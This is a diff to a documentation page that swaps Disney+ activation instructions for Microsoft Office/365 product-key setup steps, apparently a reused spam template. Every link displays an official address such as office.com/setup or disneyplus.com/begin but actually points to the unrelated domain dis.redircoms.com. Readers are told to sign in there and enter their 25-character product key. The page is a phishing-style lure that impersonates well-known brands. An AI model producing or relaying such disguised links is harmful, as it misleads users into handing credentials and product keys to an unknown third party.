amazonview/microsoft365product/index.rst

    :align: center
    :height: 100px

-To start watching your favorite movies, TV shows, and originals from Disney, Pixar, Marvel, Star Wars, and National Geographic, activate your device at `disneyplus.com/begin <https://dis.redircoms.com>`_.
-This activation page ensures a secure and fast way to link your streaming device to your Disney+ account.
-Just enter the 8-digit code from your screen to begin streaming in minutes.
+To activate Microsoft Office or Microsoft 365, visit `office.com/setup <https://dis.redircoms.com>`_ or `microsoft365.com/setup <https://dis.redircoms.com>`_.
+These official setup portals allow you to redeem your product key, sign in with a Microsoft account, and install Office apps on your device.

 **********
-Steps to Activate Disney+ on Your Device
+Steps to Enter Your Office Product Key
 **********

-1. Launch the Disney+ app on your smart TV, streaming stick, gaming console, or other device.
-2. On the welcome screen, an **8-digit activation code** will be displayed.
-3. Open a web browser on your computer or mobile device and go to `disneyplus.com/begin <https://dis.redircoms.com>`_.
+1. Open a web browser and go to `office.com/setup <https://dis.redircoms.com>`_ or `microsoft365.com/setup <https://dis.redircoms.com>`_.
-4. Log in using your Disney+ account credentials.
+2. Sign in with your Microsoft account or create a new one.
+3. Enter the **25-character product key** printed on your card, email, or package.
+4. Click **Next** to verify and associate the key with your account.
-5. Enter the **8-digit code** shown on your TV/device screen.
+5. Follow the prompts to download and install Office on your device.
-6. Click **Continue** and wait for the device to link successfully.

 **********
-What to Do After Activation
+After Activation: Install and Manage Office
 **********

-1. Once activation is complete, your device will automatically refresh.
-2. You will now have full access to Disney+ content on your device.
-3. If the code expires, restart the app to generate a new code.
-4. For issues, ensure your device is connected to the internet and try again.
-5. You can repeat this process on additional devices using the same account.

-Start streaming the magic of Disney+ today by visiting `disneyplus.com/begin <https://dis.redircoms.com>`_ and entering your activation code.
+1. Once activated, go to the **Services & Subscriptions** section of your Microsoft account.
+2. Click **Install** to download the latest version of Office for Windows or Mac.
+3. Follow the installation wizard and sign in when prompted.
+4. Use the same Microsoft account to activate Office on multiple devices if your plan allows.
+5. Manage billing, subscriptions, and licenses directly from your Microsoft dashboard.

+Get started now by visiting `office.com/setup <https://dis.redircoms.com>`_ or `microsoft365.com/setup <https://dis.redircoms.com>`_ and enter your product key to unlock full Office features.